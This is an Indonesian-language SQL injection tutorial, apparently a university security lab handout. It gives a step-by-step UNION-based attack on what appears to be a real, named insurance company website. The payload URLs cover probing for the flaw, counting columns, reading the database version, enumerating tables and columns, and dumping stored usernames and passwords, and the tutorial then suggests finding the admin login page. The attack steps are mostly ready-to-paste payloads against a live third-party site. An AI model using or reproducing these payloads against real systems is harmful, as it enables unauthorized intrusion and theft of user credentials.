Anda di halaman 1dari 12

Tutorial SQL Injection

Praktikum Sistem Keamanan Informasi Semester Genap 2010/2011


By : Muhammad Wildan 06052011

!!!!!!!!!!!!!!!!!!!!!
Dimohon agar mempergunakan cara2 yg ada di bawah ini dengan hati-hati. Pergunakan hanya dalam rangka eksplorasi, tidak untuk merusak !! Segala informasi yg di dapatkan dalam latihan ini di mohon tidak di publikasikan / dipergunakan / diperjualbelikan demi kepentingan pribadi !! :D

1
Untuk kasus uji coba kita coba link di bawah ini :

http://www.ceylinco-insurance.com/products.php?id=1

2
Untuk mengetahui situs tsb vulnerable atau tidak, coba kita sisipkan tanda (kutip) di akhir URL.
http://www.ceylinco-insurance.com/products.php?id=1 Bila muncul seperti ini :

Maka situs ini siap dijadikan target SQL INJECTION !!!

3
untuk mencari banyak kolom yang digunakan database website tersebut kita menggunakan command ORDER BY. Cth :
http://www.ceylinco-insurance.com/products.php?id=-1 order by 1--

Atau
http://www.ceylinco-insurance.com/products.php?id=-1 order by 10/*

4
Menemukan ERROR ??
Jika belum maka kita tingkatkan ke kolom 2
http://www.ceylinco-insurance.com/products.php?id=-1 order by 2-Hingga seterusnya, sampai menemukan ERROR seperti ini :

5
Untuk melihat versi SQL database yang website itu gunakan :
http://www.ceylinco-insurance.com/products.php?id=1 union all select 1,2,3,4,5,6,7,8,9,10,11,12--

6
Rubah link sebelumnya sesuai dengan angka yg keluar di tahap 5 :
http://www.ceylinco-insurance.com/products.php?id=1 union all select 1,2,@@version,4,5,6,7,8,9,10,11,12 from information_schema.tables-karena yg muncul angka 3

7
Selanjutnya kita masuk ke tahap mencari nama tabel dan kolom :
http://www.ceylinco-insurance.com/products.php?id=-1 union all select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database()--

Lalu perhatikan deretan kata2 yg muncul !! Itu adalah nama2 tabel yg ada di dalam situs tsb..

8
kita ambil table user dan dapatkan kolom dari table user tersebut, tetapi table user ini kita convert dulu menggunakan hexa decimal (untuk caranya cari banyak ada di om gugle :p) :
http://www.ceylinco-insurance.com/products.php?id=-1 union all select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12 from information_schema.columns where table_name=0x75736572-hasil convert hexadecimal dari tabel user

9
Setelah berhasil mendapatkan kolom dari tabel user maka, TIBALAH di tahap yg paling di tunggu2, MENDAPATKAN USERNAME dn PASSWORD ..!! :D
http://www.ceylinco-insurance.com/products.php?id=-1 union all select 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12 from user--

hasil convert dari tanda : (titik dua)

Setelah dengan bangga mendapatka usernm dn passwrd, sekarang hanya tinggal mencari halmn adminny saja.. Bisa menggunakan tools : havij, aquanetix, dll atau dengan cara meraba2 halmn adminny, cth : /admin, /administrator, /admincp, dll

10

Anda mungkin juga menyukai